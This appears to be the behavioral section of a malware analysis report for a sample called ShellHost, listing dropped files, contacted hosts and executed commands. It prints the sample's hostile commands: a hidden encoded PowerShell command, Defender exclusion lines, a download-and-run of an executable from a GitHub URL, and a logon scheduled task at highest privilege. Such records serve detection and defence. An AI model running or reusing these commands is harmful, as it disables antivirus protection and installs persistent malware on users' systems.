Technical Information
- <SYSTEM32>\tasks\shellhost
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -EncodedCommand UABPAFcARQBSAFMASABFAEwATAAgAC0AQwBPAE0ATQBBAE4ARAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQARQ...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -COMMAND "Add-MpPreference -ExclusionPath %HOMEPATH% -FORCE ; Add-MpPreference -ExclusionPath %WINDIR% -FORCE"
- nul
- %TEMP%\shellhost.exe
- <SYSTEM32>\a7\shellhost.exe
- 'gi##ub.com':443
- 'ra#.####ubusercontent.com':443
- 'gi##ub.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK gi##ub.com
- DNS ASK ra#.####ubusercontent.com
- '%TEMP%\shellhost.exe'
- '<SYSTEM32>\net.exe' session
- '<SYSTEM32>\net1.exe' session
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -COMMAND "CURL -O " "%TEMP%\ShellHost.exe https://github.com/tsgjm123/am/raw/refs/heads/main/ShellHost.exe ; START %TEMP%\ShellHost.exe"
- '<SYSTEM32>\schtasks.exe' /create /tn "ShellHost" /sc ONLOGON /tr "<SYSTEM32>\a7\ShellHost.exe" /rl HIGHEST /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -COMMAND "Remove-Item -Path %LOCALAPPDATA%\Temp/ShellHost.exe"